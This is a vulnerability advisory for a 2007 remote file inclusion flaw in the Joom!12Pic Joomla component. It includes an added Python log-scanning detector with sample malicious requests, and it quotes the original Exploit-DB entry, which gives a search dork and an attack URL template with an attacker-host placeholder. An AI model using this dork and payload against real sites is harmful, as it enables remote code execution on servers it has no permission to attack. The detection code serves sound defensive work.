by: Anonymous
CVSS: 5.5 (MEDIUM)
Remote File Inclusion (RFI)
CWE: 98
Patch Exists: NO
2007

Joom!12Pic Component RFI

The Joom!12Pic component in com_joom12pic/admin.joom12pic.php allows remote attackers to include arbitrary files via the mosConfig_live_site parameter.

Mitigation:

Update to the latest version of the Joom!12Pic component.
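
For detection while the component is still installed, the following added example (not part of the original advisory or of the component's code) scans web access logs for requests that set mosConfig_live_site from the query string. It assumes the Apache/nginx "combined" log format; the function names, severity labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: client, two idents, [time], "request", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Value starts with a URI scheme ("http:", "ftp:", "php:") or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//)', re.I)
PARAM = "mosConfig_live_site"
COMPONENT = "/components/com_joom12pic/"

def classify(line):
    """Return a finding dict if the request sets PARAM, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP rewrites "." and " " in incoming parameter names to "_".
        if name.replace(".", "_").replace(" ", "_") != PARAM:
            continue
        remote = bool(REMOTE_RE.match(value))
        in_component = COMPONENT in unquote(url.path).lower()
        if remote and in_component:
            severity = "high"      # remote value sent to the affected script path
        elif remote:
            severity = "medium"    # same parameter set on a different script
        else:
            severity = "low"       # config variable should never come from a client
        return {"ip": m["ip"], "path": url.path, "value": value,
                "status": int(m["status"]), "severity": severity}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Sep/2007:10:00:00 +0000] "GET /administrator/components/'
    'com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http%3A%2F%2Fexample.invalid%2Fa.txt%3F'
    ' HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [16/Sep/2007:10:00:05 +0000] "GET /index.php?option=com_content&id=1'
    ' HTTP/1.1" 200 4096 "-" "-"',
    '203.0.113.5 - - [16/Sep/2007:10:00:09 +0000] "GET /index.php?mosConfig.live.site=//example.invalid/a'
    ' HTTP/1.1" 404 208 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding with a 200 status is the one to triage first; the same pattern can be turned into a web-server or WAF rule that rejects any request carrying this parameter.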

Exploit-DB raw data:

######################################
# Joom!12Pic Component RFI           #
######################################

Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joom12pic"

Example:

http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-16]